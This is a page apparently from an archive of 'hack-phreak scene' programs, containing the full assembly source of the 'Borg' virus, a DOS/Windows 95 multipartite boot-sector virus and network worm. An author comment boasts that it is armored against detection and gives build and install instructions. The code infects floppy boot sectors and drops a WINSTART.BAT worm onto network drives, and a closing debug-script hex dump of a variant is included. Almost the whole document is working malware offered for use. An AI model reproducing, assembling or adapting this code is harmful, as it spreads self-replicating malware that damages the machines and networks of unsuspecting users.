home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Collection of Hack-Phreak Scene Programs
/
cleanhpvac.zip
/
cleanhpvac
/
CCTX0198.ZIP
/
QMUPDAT7.ZIP
/
BORG.ZIP
/
BORG.ASM
next >
Wrap
Assembly Source File
|
1997-02-21
|
12KB
|
385 lines
comment *
"Q" the Misanthrope introduced Starfleet to the Borg. He now introduces
Earth to the Borg Virus. It is an UMB resident multipartite virus and network
worm. It works with Windows 95 and infects floppy boot sectors and drops
it's worm code on network drives. (you will be assimilated) It is well
armored and CAN NOT be easily detected or removed when memory resident.
(resistance is futile) AVP should do a good write up of the virus when they
get it.
tasm borg /m2
tlink borg
exe2bin borg.exe borg.com
format a:/q/u
debug borg.com
l 300 0 0 1
w 100 0 0 1
w 300 0 20 1
m 120,4000 100
w
q
borg
copy borg.com c:\winstart.bat
*
.286
qseg segment byte public 'CODE'
assume cs:qseg,es:qseg,ss:nothing,ds:qseg
top: jmp short jmp_install
db 90h
db "MSDOS5.0"
dw 512
db 1
dw 1
db 2
dw 224
dw 2880
db 0F0h
dw 9
dw 18
dw 2
org 00020h
com_install proc near
db "::"
js jmp_next_part
jns jmp_next_part
jmp_install: jo install
jno install
scandisk_line equ $-01h
db "CANDSKW"
db 0dh,0ah,"@ECHO "
db "INSTALLHIGH="
winstart_line db "\WINSTART.BAT"
winstart_null db ">>"
config_line db "C:\CONFIG.SYS"
config_null db 0dh,0ah,"@COPY/B %0+%0.* C:\>NUL",1ah
jmp_next_part: jmp short go_mem_res
com_install endp
install proc near
es_bx equ $+01h
mov si,7c00h
add al,0b7h
push cs
pop ds
les bx,dword ptr ds:[si+es_bx-top]
push cs
push bx
cld
push es
mov di,si
mov cx,(offset previous_hook-top)/02h
push si
push cx
rep movsw
pop cx
pop si
call return_far
pusha
rep movsw
popa
add di,0080h
rep movsw
mov si,1ah*04h
mov ax,offset interrupt_1a-com_install+037eh
cmp word ptr ds:[si],ax
je already_res
movsw
movsw
mov word ptr ds:[si-02h],0beb6h
mov word ptr ds:[si-04h],ax
already_res: push ds
pop es
mov ax,0201h
install endp
set_cx_dx proc near
mov bp,word ptr ds:[bx+11h]
shr bp,04h
mov cx,word ptr ds:[bx+16h]
shl cx,01h
add cx,bp
inc cx
sub cx,word ptr ds:[bx+18h]
mov dh,01h
int 13h
return_far: retf
set_cx_dx endp
go_mem_res proc near
les bp,dword ptr ds:[2ah]
inc byte ptr ss:[bp+02h]
mov ah,49h
int 21h
mov di,offset scandisk_device-com_install-0ah+0100h
dec bp
next_device: mov ah,52h
int 21h
cld
lds si,dword ptr es:[bx+22h]
push cs
pop es
mov ax,di
movsw
movsw
mov word ptr ds:[si-02h],cs
mov word ptr ds:[si-04h],ax
mov ax,8004h
stosw
add di,offset winstart_device-scandisk_device-06h
inc bp
jnz next_device
mov di,resident_isr21-com_install+0100h
set_int_18_21: push cs
pop ds
mov ax,3521h
int 21h
mov word ptr ds:[previous_hook-com_install+0100h],bx
mov word ptr ds:[previous_hook-com_install+0102h],es
mov ax,2518h
push es
pop ds
mov dx,bx
int 21h
mov dx,di
mov al,21h
push cs
pop ds
int 18h
mov ah,31h
mov dx,((tail-com_install+010fh) SHR 4)
retn
go_mem_res endp
make_winstart proc near
mov dx,offset winstart_copy-com_install+0100h
mov di,offset winstart_device-com_install+0100h
mov ah,5bh
xor byte ptr ds:[di],ah
xor cx,cx
int 18h
mov byte ptr ds:[di],"W"
mov bh,40h
jc return_back
xchg ax,bx
mov dx,0100h
mov ch,03h
int 18h
mov ah,3eh
int 18h
return_back: retn
make_winstart endp
interrupt_24 proc near
mov al,03h
iret
interrupt_24 endp
resident_isr21 proc near
pusha
push ds
push es
pushf
push cs
pop ds
cmp ah,38h
jne not_infect_now
mov ah,19h
int 18h
or al,al
jnz check_network
cwd
mov bx,offset vbuffer-com_install+0100h
mov cx,0001h
push cs
pop es
mov ax,0201h
int 13h
jc not_infect_now
mov si,0000h
org $-02h
jmp $(jmp_install-top)
cmp word ptr ds:[bx],si
je not_infect_now
mov ax,0301h
pusha
push cs
call set_cx_dx
cld
mov word ptr ds:[bx],si
mov cx,(previous_hook-com_install)/02h
mov si,0100h
lea di,word ptr ds:[bx+com_install-top]
rep movsw
popa
int 13h
check_network: mov ax,4409h
xor bx,bx
int 18h
test dh,10h
jz not_infect_now
mov ax,3524h
int 18h
pusha
mov dx,offset interrupt_24-com_install+0100h
mov ah,25h
int 18h
call make_winstart
popa
mov dx,bx
push es
pop ds
int 18h
not_infect_now: popf
jmp short pop_it
resident_isr21 endp
interrupt_21 proc near
pusha
push ds
push cs
pop ds
xor ah,4bh
jz set_21_back
mov ax,4300h
mov byte ptr ds:[config_null-com_install+02feh],al
mov byte ptr ds:[winstart_null-com_install+02feh],al
mov dx,offset config_line-com_install+02feh
int 18h
jc pop_ds_and_all
call make_winstart
set_21_back: lds dx,dword ptr ds:[previous_hook-com_install+0100h]
mov ax,2521h
int 18h
jmp short pop_ds_and_all
interrupt_21 endp
org 001deh
interrupt_1a proc near
pusha
mov ax,1200h
push ds
push es
int 2fh
inc al
jnz pop_it
lds dx,dword ptr cs:[previous_hook-com_install+037eh]
mov ax,251ah
int 21h
mov di,offset interrupt_21-com_install+0100h
call set_int_18_21
pop_it: pop es
pop_ds_and_all: pop ds
popa
interrupt_1a endp
org 001fdh
far_jmp proc near
db 0eah
previous_hook: label double
far_jmp endp
boot_signature dw 0aa55h
org scandisk_line+01feh
scandisk_copy db "SCANDSKW"
org winstart_line+01feh
winstart_copy db "\WINSTART.BAT",00h
org scandisk_copy+0080h
scandisk_device db "SCANDSKW"
org winstart_copy+0080h
db 00h
winstart_device db "WINSTART"
vbuffer label byte
org vbuffer+0200h
tail label byte
qseg ends
end
comment *
nborg.com
e0100 3A 3A 78 57 79 55 70 55 71 53 43 41 4E 44 53 4B
e0110 57 0D 0A 40 45 43 48 4F 20 49 4E 53 54 41 4C 4C
e0120 48 49 47 48 3D 5C 57 49 4E 53 54 41 52 54 2E 42
e0130 41 54 3E 3E 43 3A 5C 43 4F 4E 46 49 47 2E 53 59
e0140 53 0D 0A 40 43 4F 50 59 2F 42 20 25 30 2B 25 30
e0150 2E 2A 20 43 3A 5C 3E 4E 55 4C 1A EB 55 BE 00 7C
e0160 04 B7 0E 1F C4 5C 7E 0E 53 FC 06 8B FE B9 FF 00
e0170 56 51 F3 A5 59 5E E8 38 00 60 F3 A5 61 81 C7 80
e0180 00 F3 A5 BE 68 00 B8 3C 05 39 04 74 0A A5 A5 C7
e0190 44 FE B6 BE 89 44 FC 1E 07 B8 01 02 8B 6F 11 C1
e01A0 ED 04 8B 4F 16 D1 E1 03 CD 41 2B 4F 18 B6 01 CD
e01B0 13 CB C4 2E 2A 00 FE 46 02 B4 49 CD 21 BF 7D 03
e01C0 4D B4 52 CD 21 FC 26 C5 77 22 0E 07 8B C7 A5 A5
e01D0 8C 4C FE 89 44 FC B8 04 80 AB 83 C7 17 45 75 E1
e01E0 BF 2E 02 0E 1F B8 21 35 CD 21 89 1E DE 02 8C 06
e01F0 E0 02 B8 18 25 06 1F 8B D3 CD 21 8B D7 B0 21 0E
e0200 1F CD 18 B4 31 BA 5B 00 C3 BA 23 03 BF A4 03 B4
e0210 5B 30 25 33 C9 CD 18 C6 05 57 B7 40 72 0C 93 BA
e0220 00 01 B5 03 CD 18 B4 3E CD 18 C3 B0 03 CF 60 1E
e0230 06 9C 0E 1F 80 FC 38 75 5B B4 19 CD 18 0A C0 75
e0240 30 99 BB AC 03 B9 01 00 0E 07 B8 01 02 CD 13 72
e0250 43 BE EB 24 39 37 74 3C B8 01 03 60 0E E8 3C FF
e0260 FC 89 37 B9 EF 00 BE 00 01 8D 7F 20 F3 A5 61 CD
e0270 13 B8 09 44 33 DB CD 18 F6 C6 10 74 17 B8 24 35
e0280 CD 18 60 BA 2B 02 B4 25 CD 18 E8 7C FF 61 8B D3
e0290 06 1F CD 18 9D EB 43 60 1E 0E 1F 80 F4 4B 74 13
e02A0 B8 00 43 A2 3F 03 A2 30 03 BA 32 03 CD 18 72 2B
e02B0 E8 56 FF C5 16 DE 02 B8 21 25 CD 18 EB 1D 60 B8
e02C0 00 12 1E 06 CD 2F FE C0 75 10 2E C5 16 5C 05 B8
e02D0 1A 25 CD 21 BF 97 02 E8 09 FF 07 1F 61 EA 55 AA
e02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e0300 00 00 00 00 00 00 00 53 43 41 4E 44 53 4B 57 00
e0310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e0320 00 00 00 5C 57 49 4E 53 54 41 52 54 2E 42 41 54
e0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e0380 00 00 00 00 00 00 00 53 43 41 4E 44 53 4B 57 00
e0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e03A0 00 00 00 00 57 49 4E 53 54 41 52 54 5A 59 5B 58
e03B0 C3 53 51 8B 1E F4 02 83 FB FF 75 05 2B C0 99 EB
e03C0 21 8E 06 0E 06 B8 10 00 26 F7 67 08
rcx
2cc
w
q
*